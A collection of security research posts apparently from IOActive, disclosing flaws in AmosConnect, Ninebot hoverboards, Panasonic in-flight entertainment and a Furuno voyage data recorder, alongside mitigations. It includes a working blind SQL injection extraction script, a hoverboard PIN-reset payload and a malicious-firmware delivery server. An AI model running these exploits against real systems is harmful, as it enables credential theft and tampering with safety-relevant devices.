RESEARCH | October 26, 2017

AmosConnect: Maritime Communications Security Has Its Flaws

Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper into this area, and have learned a lot more about some of the environments in which these systems are deployed.

Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.


The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.

Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect.

AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as: 

  • E-mail
  • Instant messaging
  • Position reporting
  • Crew Internet
  • Automatic file transfer
  • Application integration


We have identified two critical vulnerabilities in this software that allow unauthenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities, but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.

 

Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit.

The following POST request is sent when a user tries to log into AmosConnect:


The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks.

Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.password';

SELECT key, value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.email_address';
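
To make the time-based technique concrete, here is a minimal sketch of an extraction loop. Only the parameter name and the SQLite backend come from the findings above; the endpoint path, injection string, and timing threshold are assumptions (SQLite has no sleep(), so forcing an expensive randomblob() evaluation is the usual stand-in for a delay):

import string
import time
import requests

URL = "https://target/amosconnect/login"       # hypothetical endpoint path

def is_true(condition: str) -> bool:
    # Inject into the vulnerable parameter and measure the response time.
    payload = ("x' AND (SELECT CASE WHEN (" + condition +
               ") THEN randomblob(300000000) ELSE 1 END)--")
    t0 = time.time()
    requests.post(URL, data={"data[MailUser][emailAddress]": payload,
                             "data[MailUser][password]": "x"},
                  verify=False, timeout=60)
    return time.time() - t0 > 5.0              # threshold: tune per target

def extract(query: str, max_len: int = 64) -> str:
    # Recover the result of `query` one character at a time.
    out = ""
    for i in range(1, max_len + 1):
        for c in string.ascii_letters + string.digits + "@.-_":
            if is_true("substr((" + query + ")," + str(i) + ",1)='" + c + "'"):
                out += c
                break
        else:
            break                              # no match: end of string
    return out

print(extract("SELECT value FROM MOBILE_PROPS WHERE key LIKE 'USER.%.password' LIMIT 1"))

Each character costs one deliberately slow request, so dumping the two properties above is a matter of minutes.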

The authentication method is implemented in mail_user.php:

The call to findByEmail() instantiates a COM object that is implemented in native C++ code.

 

The following C++ native methods are invoked upon execution of the call:
     Neptune::UserManager::User::findByEmail(…)
          Neptune::ConfigManager::Property::findBy( … )
               Neptune::ConfigManager::Property::findAllBy( … )
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:

 

 

Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
"[…] deleted = 0 AND key like 'USER.%.email_address' AND upper(value) like '{email}'"
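
The fix for this bug class is to bind user input rather than splicing it into the query string. A minimal sketch in Python against SQLite (the vulnerable code is C++, but the principle is the same; the database file name is made up):

import sqlite3

conn = sqlite3.connect("neptune.db")           # hypothetical database file
email = "X' OR '1'='1"                         # hostile input

# Vulnerable pattern, equivalent to the concatenation shown above:
unsafe = ("SELECT key, value FROM MOBILE_PROPS WHERE deleted = 0 "
          "AND key LIKE 'USER.%.email_address' "
          "AND upper(value) LIKE '" + email + "'")

# Safe pattern: the driver binds the value, so a quote inside `email`
# can no longer terminate the string literal.
rows = conn.execute(
    "SELECT key, value FROM MOBILE_PROPS WHERE deleted = 0 "
    "AND key LIKE 'USER.%.email_address' AND upper(value) LIKE ?",
    (email.upper(),),
)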

 

Privileged Backdoor Account

The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
 
Users accessing the AmosConnect server see the following login screen:
 
The login website reveals the Post Office ID; this ID identifies the AmosConnect server and is tied to the software license.
 
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
 
authenticateBackdoorUser() is implemented as follows:
 
 
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:
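
The snippet itself is omitted here, but the shape of the flaw can be shown with a stand-in: the SysAdmin password is derived deterministically from the Post Office ID, a value the login page hands to anyone. The derivation below is hypothetical, purely to illustrate the pattern; it is not Inmarsat's actual algorithm.

import hashlib

def sysadmin_password(post_office_id: str) -> str:
    # HYPOTHETICAL derivation for illustration only. Like the real one,
    # it maps the publicly visible Post Office ID to the backdoor
    # password with no secret input, so anyone can recompute it.
    return hashlib.md5(post_office_id.encode()).hexdigest()[:8]

print(sysadmin_password("70000000"))           # made-up Post Office ID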
Conclusions and thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
  • Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
  • Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configurations, the ICS and Navigation networks may actually be the same.
  • IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; it’s within this network that AmosConnect is typically deployed.
  • Bring-Your-Own-Device (BYOD) networks. Vessels may feature a separate network to provide internet connectivity to guests or crew members’ personal devices.
  • SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, it’s important to note that within certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest” and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some of the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
 
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
References:
https://shiptracker.shodan.io/
RESEARCH | July 19, 2017

Multiple Critical Vulnerabilities Found in Popular Motorized Hoverboards

Not that long ago, motorized hoverboards were in the news – according to widespread reports, they had a tendency to catch on fire and even explode. Hoverboards were so dangerous that the National Association of State Fire Marshals (NASFM) issued a statement recommending consumers “look for indications of acceptance by recognized testing organizations” when purchasing the devices. Consumers were even advised to not leave them unattended due to the risk of fires. The Federal Trade Commission has since established requirements that any hoverboard imported to the US meet baseline safety requirements set by Underwriters Laboratories.

Since hoverboards were a popular item used for personal transportation, I acquired a Ninebot by Segway miniPRO hoverboard in September of 2016 for recreational use. The technology is amazing and a lot of fun, making it very easy to learn and become a relatively skilled rider.

The hoverboard is also connected and comes with a rider application that enables the owner to do some cool things, such as change the light colors, remotely control the hoverboard, and see its battery life and remaining mileage. I was naturally a little intrigued and couldn’t help but start doing some tinkering to see how fragile the firmware was. In my past experience as a security consultant, previous well-chronicled issues brought to mind that if vulnerabilities do exist, they might be exploited by an attacker to cause some serious harm.

When I started looking further, I learned that regulations now require hoverboards to meet certain mechanical and electrical specifications with the goal of preventing battery fires and various mechanical failures; however, there are currently no regulations aimed at ensuring firmware integrity and validation, even though firmware is also integral to the safety of the system.

Let’s Break a Hoverboard

Using reverse engineering and protocol analysis techniques, I was able to determine that my Ninebot by Segway miniPRO (Ninebot purchased Segway Inc. in 2015) had several critical vulnerabilities that were wirelessly exploitable. These vulnerabilities could be used by an attacker to bypass safety systems designed by Ninebot, one of the only hoverboards approved for sale in many countries.

Using protocol analysis, I determined I didn’t need to use a rider’s PIN (Personal Identification Number) to establish a connection. Even though the rider could set a PIN, the hoverboard did not actually change its default PIN of “000000.” This allowed me to connect over Bluetooth while bypassing the security controls. I could also document the communications between the app and the hoverboard, since they were not encrypted.

Additionally, after attempting to apply a corrupted firmware update, I noticed that the hoverboard did not implement any integrity checks on firmware images before applying them. This means an attacker could apply any arbitrary update to the hoverboard, which would allow them to bypass safety interlocks.

Upon further investigation of the Ninebot application, I also determined that connected riders in the area were indexed using their smart phones’ GPS; therefore, each rider’s location is published and publicly available, making actual weaponization of an exploit much easier for an attacker.

To show how this works, an attacker using the Ninebot application can locate other hoverboard riders in the vicinity:

 

An attacker could then connect to the miniPRO using a modified version of the Nordic UART application, the reference implementation of the Bluetooth service used in the Ninebot miniPRO. This application allows anyone to connect to the Ninebot without being asked for a PIN. By sending the following payload from the Nordic application, the attacker can change the application PIN to “111111”:
unsigned char payload[14] =
{0x55, 0xAA, 0x08, 0x0A, 0x03, 0x17, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0xAD, 0xFE}; // Set the hoverboard PIN to "111111"
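
The trailing 0xAD 0xFE is a checksum. Working backward from the published payload (an inference from the bytes, not Ninebot documentation), it matches the bitwise complement of the 16-bit sum of every byte after the 0x55 0xAA header, appended little-endian. A sketch that builds the set-PIN frame for an arbitrary PIN:

def ninebot_set_pin(pin: str) -> bytes:
    # Frame layout inferred from the payload above: 0x55 0xAA header,
    # then 0x08 0x0A 0x03 0x17, six ASCII PIN digits, and a checksum.
    assert len(pin) == 6 and pin.isdigit()
    body = bytes([0x08, 0x0A, 0x03, 0x17]) + pin.encode("ascii")
    checksum = ~sum(body) & 0xFFFF             # complement of 16-bit sum
    return bytes([0x55, 0xAA]) + body + checksum.to_bytes(2, "little")

# Reproduces the published payload byte for byte:
assert ninebot_set_pin("111111").hex() == "55aa080a0317313131313131adfe"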

 

Figure 1 – miniPRO PIN Theft


Using the PIN “111111,” the attacker can then launch the Ninebot application and connect to the hoverboard. This would lock a normal user out of the Ninebot mobile application because a new PIN has been set.

Using DNS spoofing, an attacker can upload an arbitrary firmware image by spoofing the domain record for apptest.ninebot.cn. The mobile application downloads the image and then uploads it to the hoverboard:

On http://apptest.ninebot.cn, change the /appversion/appdownload/NinebotMini/version.json file to match your new firmware version and size. The example below forces the application to update the control/mainboard firmware image (aka driver board firmware) to v1.3.3.7, which is 50212 bytes in size.

"CtrlVersionCode":["1337","50212"]

Create a matching directory and file including the malicious firmware (/appversion/appdownload/NinebotMini/v1.3.3.7/Mini_Driver_v1.3.3.7.zip) with the modified update file Mini_Driver_V1.3.3.7.bin compressed inside of the firmware update archive.
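
A sketch of the attacker's side of this flow, assuming apptest.ninebot.cn already resolves to the attacker's machine (the DNS spoofing step) and that the two paths above hold the spoofed manifest and archive; everything else here is illustrative:

# Serve the spoofed manifest and firmware. Run from a directory containing:
#   appversion/appdownload/NinebotMini/version.json
#     (advertising "CtrlVersionCode":["1337","50212"])
#   appversion/appdownload/NinebotMini/v1.3.3.7/Mini_Driver_v1.3.3.7.zip
import http.server

class Handler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, fmt, *args):
        print("app fetched:", self.path)       # watch the update flow

# The app fetches over plain HTTP, so bind port 80 (requires root).
http.server.HTTPServer(("0.0.0.0", 80), Handler).serve_forever()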


When launched, the Ninebot application checks to see if the firmware version on the hoverboard matches the one downloaded from apptest.ninebot.cn. If there is a later version available (that is, if the version in the JSON object is newer than the version currently installed), the app triggers the firmware update process.

Analysis of Findings
Even though the Ninebot application prompted a user to enter a PIN when launched, it was not checked at the protocol level before allowing the user to connect. This left the Bluetooth interface exposed to an attack at a lower level. Additionally, since this device did not use standard Bluetooth PIN-based security, communications were not encrypted and could be wirelessly intercepted by an attacker.

Exposed management interfaces should not be available on a production device. An attacker may leverage an open management interface to execute privileged actions remotely. Due to the implementation in this scenario, I was able to leverage this vulnerability and perform a firmware update of the hoverboard’s control system without authentication.

Firmware integrity checks are imperative in embedded systems. Unverified or corrupted firmware images could permanently damage systems and may allow an attacker to cause unintended behavior. I was able to modify the controller firmware to remove rider detection, and may have been able to change configuration parameters in other onboard systems, such as the BMS (Battery Management System) and Bluetooth module.
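
As a sketch of the kind of check that was missing (assuming a vendor-held signing key; the library, key handling, and file names are illustrative, not Ninebot's actual update path):

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Demo keypair; in practice only the public key ships on the device.
vendor_key = Ed25519PrivateKey.generate()
device_trusted_pubkey = vendor_key.public_key()

firmware = open("Mini_Driver_V1.3.3.7.bin", "rb").read()
signature = vendor_key.sign(firmware)          # produced at the factory

# On the hoverboard, before flashing:
try:
    device_trusted_pubkey.verify(signature, firmware)
except InvalidSignature:
    raise SystemExit("refusing to flash a modified or unsigned image")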

Figure 2 – Unencrypted Communications between Hoverboard and Android Application


Figure 3 – Interception of Android Application Setting PIN Code to “111111”
 
Mitigation
As a result of the research, IOActive made the following security design and development recommendations to Ninebot that would correct these vulnerabilities:
  • Implement firmware integrity checking.
  • Use Bluetooth Pre-Shared Key authentication or PIN authentication.
  • Use strong encryption for wireless communications between the application and hoverboard.
  • Implement a “pairing mode” as the sole mode in which the hoverboard pairs over Bluetooth.
  • Protect rider privacy by not exposing rider location within the Ninebot mobile application. 

IOActive recommends that end users stay up-to-date with the latest versions of the app from Ninebot. We also recommend that consumers avoid hoverboard models with Bluetooth and wireless capabilities.

Responsible Disclosure
After completing the research, IOActive subsequently contacted and disclosed the details of the vulnerabilities identified to Ninebot. Through a series of exchanges since the initial contact, Ninebot has released a new version of the application and reported to IOActive that the critical issues have been addressed.

  • December 2016: IOActive conducts testing on the Ninebot by Segway miniPRO hoverboard.
  • December 24, 2016: IOActive contacts Ninebot via a public email address to establish a line of communication.
  • January 4, 2017: Ninebot responds to IOActive.
  • January 27, 2017: IOActive discloses issues to Ninebot.
  • April 2017: Ninebot releases an updated application (3.20), which includes fixes that address some of IOActive’s findings.
  • April 17, 2017: Ninebot informs IOActive that remediation of critical issues is complete.
  • July 19, 2017: IOActive publishes findings.
For more information about this research, please refer to the following additional materials:
RESEARCH | December 20, 2016

In Flight Hacking System

In my five years with IOActive, I’ve had the opportunity to visit some awesome places, often thousands of kilometers from home. So flying has obviously been an integral part of my routine. You might not think that’s such a big deal, unless like me, you’re afraid of flying. I don’t think I can completely get rid of that anxiety; after dozens of flights my hands still sweat during takeoff, but I’ve learned to live with it, even enjoying it sometimes…and spending some flights hacking stuff.

What helped a lot to reduce that fear was understanding how things work in planes, and getting used to noises, bumps, and turbulence. This blog post is about understanding a bit more about how things work aboard an aircraft; more specifically, about the In-Flight Entertainment Systems (IFE) developed by Panasonic Avionics.

While I was flying from Warsaw to Dubai two years ago, I decided to try my luck and play with the IFE a little bit, touching this and that. Suddenly, after touching a specific point in one of the screen’s upper corners, the device returned this debug information: 

 
----
Interactive: ek_seatappbase_1280x768_01.01.18.01.cram
Content: ek_seatappcontent_1280x768.01.01.8.01.cram
Engine: qtengine_01.14.0.01.squash
LRU Type: 196 2
IP: 172.17.148.48

Media Player Auto Popup Enabled: false
----
After arriving in Dubai and spending some time searching those keywords in Google, I discovered hundreds of publicly available firmware updates for multiple airlines:

 

These files were obviously being actively updated, so it was possible to gain access to the latest versions deployed on aircraft. Today the files are still there, although the directory listing is no longer available.

The airlines I was able to find firmware updates available for included:

  • Emirates
  • AirFrance
  • Aerolineas Argentinas
  • United
  • Virgin
  • Singapore
  • FinnAir
  • Iberia
  • Etihad
  • Qatar
  • KLM
  • American Airlines
  • Scandinavian 
An IFE follows this basic architecture:
System Control Unit (SCU)

This needs to be a certified airborne server. Passengers can access real-time information about the flight, such as wind speed, latitude, longitude, altitude, and outside temperature. The SCU receives all of these values via the avionics bus (usually ARINC 429) and makes them available for the Seat Display Unit (SDU) through an Ethernet connection.
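
For flavor, ARINC 429 traffic is a stream of 32-bit words: an 8-bit label identifying the parameter, a 2-bit source/destination identifier (SDI), a 19-bit data field, a sign/status matrix (SSM), and an odd parity bit. A sketch of unpacking one word, assuming the common bit layout (label bit-ordering conventions vary between implementations):

def parse_arinc429(word: int) -> dict:
    # Common ARINC 429 layout: label bits 1-8, SDI 9-10, data 11-29,
    # SSM 30-31, odd parity bit 32.
    assert 0 <= word < 2**32
    return {
        "label": oct(word & 0xFF),             # labels are read in octal
        "sdi":   (word >> 8) & 0x3,
        "data":  (word >> 10) & 0x7FFFF,       # 19-bit payload
        "ssm":   (word >> 29) & 0x3,
        "parity_ok": bin(word).count("1") % 2 == 1,
    }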

Seat Display Unit (SDU)
This LRU (Line Replaceable Unit) allows the passenger to consume passive and active functions implemented in the IFE, such as watching movies, buying items, reading articles, or connecting to the internet. It’s basically an embedded device with a touchscreen; the newest are based on Android, while legacy devices mainly use Linux.

 
Removing an SDU – this is a Rave AIX SDU shown, not a Panasonic Avionics model (source: http://airfax.com/blog/wp-content/uploads/2012/06/RAVE_AIX_2012.jpg)
 
Personal Control Unit (PCU)
This handset is optional. The PCU can control the SDU, and as I’ll cover later, it can also act as a credit card reader.

Cabin Crew Panel
Flight attendants and other crew members use these units to control features of the aircraft such as lights, actuators (including beds), announcements, onboard shopping, or the PA system, in order to attend to passenger needs. The Cabin Management System (CMS) is normally integrated with the IFE. Panasonic Avionics integrates the aircraft’s CMS and in-flight entertainment (IFE) systems with its Global Communications Services, featuring shared system functionality for simple operation by the cabin crew (see https://www.panasonic.aero/inflight-systems/cabin-systems/). The IFE CrewApp is accessible from the Cabin Crew Panel.

Panasonic IFE
There are multiple Panasonic IFEs: the “legacy” 3000/3000i and the newest X Series eFX, eX2, and eX3 (Android-based). Hardware may vary among them, but they share a similar architecture and some common features. You can find more details on these IFEs on the Panasonic Avionics website at https://www.panasonic.aero. These systems support a large range of personalization features, which allow airlines to deploy tailored IFEs while the code base remains pretty much the same.

My analysis of the firmware files did not clearly reveal the approach used to perform data loading on the ground. Usually IFEs perform content updates via Wi-Fi ad-hoc networks or high-speed mobile data links once the aircraft touches down; Panasonic Avionics IFEs are mostly updated over “sneakernet.” While in flight, satellite communications or custom mobile data links are also possible. However, in most cases IFEs operate offline, with their contents preloaded. Usually the IFE doesn’t even check credit cards in real time.

The Panasonic Avionics IFE follows a client-server architecture with three main components:
  • CrewApp
  • SeatApp
  • Backend

I found multiple versions of the CrewApp and SeatApp on the aforementioned website. When searching in Google for certain keywords, I also found the source code of the backend to be publicly exposed, but on a different .aero website. Although it contains the custom features and data for specific airlines, it still uses the Panasonic backend codebase.

It is impossible to cover all of the variations in a single blog post, as each airline and other companies adapt and extend the Panasonic framework to their own needs, so we will focus on specific features.

 
The Linux-based SeatApp rebooting
 

The firmware files I could analyze (in this case, software that runs on a device the user does not maintain) did not contain the complete system, just the files that should be updated. That’s a pity, because otherwise we could have acquired more details on the low-level workings of those devices. However, it is possible to get some interesting details by going through the available files.

Scripts

Panasonic Avionics has implemented its own declarative script language, used to extend and interface with the GUI and features of the main application. It supports dozens of commands that cover the entire range of functionalities.

Example core/startup.txt code
 

Reverse-engineering the main binary (airsurf), we can figure out how this script format’s parser works. In order to illustrate this approach, let’s look at #define.

The script is processed line-by-line, and when the parser detects a #define statement, it tries to parse the statement at sub_80C2690.

 

In this function there are five types that can be defined: flash, text, draw, timer, and value.

The first line of the script is a #define value, so let’s look at how it’s handled.

First, the line is parsed and the name of the define extracted. Then the parser checks to see whether the value that comes after (the green basic block below) is a number (blue basic block).

 
 If the value is not a number, it is checked against a series of variables. If one matches, it’s expanded to its value.
 
 
If the value is a number, the name/value pair will be added to a global array of defines (the blue basic block below).
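
Pulling those basic blocks together, the recovered #define handling is roughly the following (a Python rendering of the disassembled C logic in airsurf; the names are mine):

defines = {}                                   # the global define array
variables = {"TRUE": "1", "FALSE": "0"}        # placeholder variable set

def handle_define(line: str) -> None:
    parts = line.split(None, 3)                # e.g. "#define value NAME 42"
    if len(parts) != 4:
        return
    _, dtype, name, raw = parts
    if dtype not in ("flash", "text", "draw", "timer", "value"):
        return                                 # the five supported types
    value = raw.strip()
    if not value.lstrip("-").isdigit():
        # Not a number: check against the known variables and expand.
        value = variables.get(value, value)
    defines[name] = value                      # add the name/value pair

for script_line in open("core/startup.txt"):   # processed line by line
    if script_line.startswith("#define"):
        handle_define(script_line)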
 
 
For the cmd statement, the binary traverses the cmd table and invokes the associated routine, passing parameters.
We can see some interesting functionalities here, such as the routine that reads the credit card data from the handset after swiping. 
Data coming from the card reader (/dev/ccr) is parsed, and its tracks are printed out and validated.
 

We can also see regular files here, such as shell scripts, configuration files (containing hardcoded credentials), databases, resources, and libraries.

I found the following information in a tweet from someone who captured the Panasonic IFE rebooting. The SeatAppBase files are the same files we are dealing with:

‘loadlru.h’
On the newest X Series IFEs, Panasonic switched to Android and moved from the old .txt script approach to Qt QML:
 
 
The backend uses PHP. Initial analysis revealed that it had vulnerabilities:

The image above belongs to the “seat-2-seat” chat functionality, where passengers can send messages to others. It shouldn’t take long for you to figure out there is something wrong, and it’s not the only problem.

The following videos show real vulnerability tests performed in such a way that they presented no risk.


1. Bypass credit card check

 

2. Arbitrary file access (e.g., /dev/random; see the sketch after this list)

3. SQL injection
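
The arbitrary file access shown in video 2 belongs to a well-known bug class: a file name from the request is joined to a content directory without canonicalization, so "../" sequences can walk out to paths like /dev/random. A generic sketch of the bug and its fix (illustrative only; this is not Panasonic's code):

from pathlib import Path

CONTENT_ROOT = Path("/opt/ife/content")        # hypothetical content root

def serve_file_vulnerable(name: str) -> bytes:
    # "../../../../dev/random" escapes the root: the classic traversal.
    return (CONTENT_ROOT / name).open("rb").read(64)

def serve_file_fixed(name: str) -> bytes:
    path = (CONTENT_ROOT / name).resolve()
    if not path.is_relative_to(CONTENT_ROOT):  # Python 3.9+
        raise PermissionError("traversal attempt blocked")
    return path.open("rb").read(64)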

 

Potential Impacts

So how far can an attacker go by chaining and exploiting vulnerabilities in an In-Flight Entertainment system? There’s no generic response to this, but let’s try to dissect some potential general case scenarios by introducing some additional context (nonspecific to a particular company or system unless stated).

Relying exclusively on the DO-178B standard that defines Software Considerations in Airborne Systems and Equipment Certification, the IFE would technically lie within the D and E levels. Panasonic Avionics’ IFE in particular is certified at Level E. This basically means that even if the entire system fails, the impact would be something between no effect at all and passenger discomfort.

Also, I should mention that an aircraft’s data networks are divided into four domains, depending on the kind of data they process: passenger entertainment, passenger owned devices, airline information services, and finally aircraft control.

Physical control systems should be located in the Aircraft Control domain, which should be physically isolated from the passenger domains; however, this doesn’t always happen. Some aircraft use optical data diodes, while others rely upon electronic gateway modules. This means that as long as there is a physical path that connects both domains, we can’t disregard the potential for attack.

In-flight entertainment systems may be an attack vector. In some scenarios such an attack would be physically impossible due to the isolation of these systems, while in others an attack remains theoretically feasible due to the physical connectivity. IOActive has successfully compromised other electronic gateway modules in non-airborne vehicles. The ability to cross the “red line” between the passenger entertainment and owned devices domain and the aircraft control domain relies heavily on the specific devices, software and configuration deployed on the target aircraft.

In 2014 we presented a series of vulnerabilities in Satellite Communication (SATCOM) devices, including airborne SATCOM terminals. A primary concern is the sharing of these SATCOM devices between different data domains, which could allow an attacker to use this equipment to pivot from a compromised IFE to certain avionics.

On the IT side, compromising the IFE means an attacker can control how passengers are informed aboard the plane. For example, an attacker might spoof flight information values such as altitude or speed, and show a bogus route on the interactive map. An attacker might compromise the CrewApp unit, controlling the PA, lighting, or actuators for upper classes. If all of these attacks are chained, a malicious actor may create a baffling and disconcerting situation for passengers.

The capture of personal information, including credit card details, while not in scope of this research, would also be technically possible if backends that sometimes provide access to specific airlines’ frequent-flyer/VIP membership data were not configured properly.

On the bright side, while not in scope of the Panasonic Avionics IFE systems research, I believe in-flight Wi-Fi itself is not a problem because it can be implemented securely without safety and security risks.

What all of this means is that after initial analysis we do not believe these systems can resist solid attacks from skilled malicious actors. Airlines must be vigilant when it comes to their In-Flight Entertainment Systems, ensuring that these and other systems are properly segregated and each aircraft’s security posture is carefully analyzed case by case. The responsibility for security does not solely rest with an IFE manufacturer, an aircraft manufacturer, or the fleet operator. Each plays an important role in assuring a secure environment.

Responsible disclosure

We reported these findings to Panasonic Avionics in March 2015. We believe that has been enough time to produce and deploy patches, at least for the most prominent vulnerabilities. That said, we believe that in such a heterogeneous environment, with dozens of airlines involved and hundreds of versions of the software available, it’s difficult to say whether these issues have been completely resolved.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.

RESEARCH | December 9, 2015

Maritime Security: Hacking into a Voyage Data Recorder (VDR)

In 2014, IOActive disclosed a series of attacks that affect multiple SATCOM devices, some of which are commonly deployed on vessels. Although there is no doubt that maritime assets are valuable targets, we cannot limit the attack surface to those communication devices that vessels, or even large cruise ships, are usually equipped with. In response to this situation, IOActive provides services to evaluate the security posture of the systems and devices that make up the modern integrated bridges and engine rooms found on cargo vessels and cruise ships. [1]

 

There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations.

 

Port security refers to protecting all of these assets from acts of piracy, terrorism, and other unlawful activities, such as smuggling. Recent activity appears to demonstrate that cyberattacks against this sector may have been underestimated. As threats evolve, procedures and policies must improve to take these new attack scenarios into account. See, for example, https://www.federalregister.gov/articles/2014/12/18/2014-29658/guidance-on-maritime-cybersecurity-standards

 

This blog post describes IOActive’s research related to one type of equipment usually present in vessels, Voyage Data Recorders (VDRs). In order to understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of these devices, the Furuno VR-3000.

 

What is a Voyage Data Recorder?

A VDR is equivalent to an aircraft’s ‘black box’ (http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx). These devices record crucial data, such as radar images, position, speed, audio in the bridge, etc. This data can be used to understand the root cause of an accident.

 

Real Incidents

Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies.

On February 15, 2012, two Indian fishermen were shot by Italian marines onboard the Enrica Lexie merchant vessel, who supposedly opened fire thinking they were being attacked by pirates. This incident caused a serious diplomatic conflict between Italy and India, which continues to the present. https://en.wikipedia.org/wiki/Enrica_Lexie_case

 

‘Mysteriously’, the data collected from the sensors and voice recordings stored in the VDR during the hours of the incident was corrupted, making it totally unusable for the authorities’ investigation. As this story from the Indian Times mentions, the VDR could have provided authorities with crucial clues to figure out what really happened.

 

Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. This Kerala High Court document covers this fact: http://indiankanoon.org/doc/187144571/. However, we cannot say whether the model the Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008 and the Furuno VR-3000 was apparently released in 2007.

 

Just a few weeks later, on March 1, 2012, the Singapore-flagged cargo ship MV Prabhu Daya was involved in a hit-and-run incident off the Kerala coast. As a result, three fishermen were killed and one more went missing, eventually being rescued by a fishing vessel in the area. Indian authorities initiated an investigation of the accident that led to the arrest of the MV Prabhu Daya’s captain.

During that process, an interesting detail was reported in several Indian newspapers.

http://www.thehindu.com/news/national/tamil-nadu/voyage-data-recorder-of-prabhu-daya-may-have-been-tampered-with/article2982183.ece

 

So, What’s Going on Here?

From a security perspective, it seems clear VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key.

 

Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

 

As usual, I didn’t have access to the hardware; but fortunately, I played some tricks and found both firmware and software for the target VDR. The details presented below are exclusively based on static analysis and user-mode QEMU emulation (already explained in a previous blog post). [2]
 
Figure: Typical architecture of a VR-3000

 

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against aggressions in order to survive in the case of an accident. It also contains a Flash disk to store data for a 12-hour period. This unit stores all essential navigation and status data, such as bridge conversations, VHF communications, and radar images.

 

The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

 

The following documents provide more detailed information:
After spending some hours reversing the different binaries, it was clear that security is not one of the main strengths of this equipment. Multiple services are prone to buffer overflows and command injection vulnerabilities. The mechanism to update firmware is flawed. Encryption is weak. Basically, almost the entire design should be considered insecure.
 

Take this function, extracted from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just a word: Scytale.

 

Digging further into the binary services we can find a vulnerability that allows unauthenticated attackers with remote access to the VR-3000 to execute arbitrary commands with root privileges. This can be used to fully compromise the device. As a result, remote attackers are able to access, modify, or erase data stored on the VDR, including voice conversations, radar images, and navigation data.

VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software.

 

The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’

 

This service listens on 10110/TCP.

 

Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data.

 

Figure: Some of the supported commands
‘moduleserv’ supports several control messages intended to control the firmware upgrade process. Let’s analyze how it handles a ‘SOFTWARE_BACKUP_START’ request: an attacker-controlled string is used to build a command that is then executed without being properly sanitized. Therefore, this vulnerability allows remote unauthenticated attackers to execute arbitrary commands with root privileges.
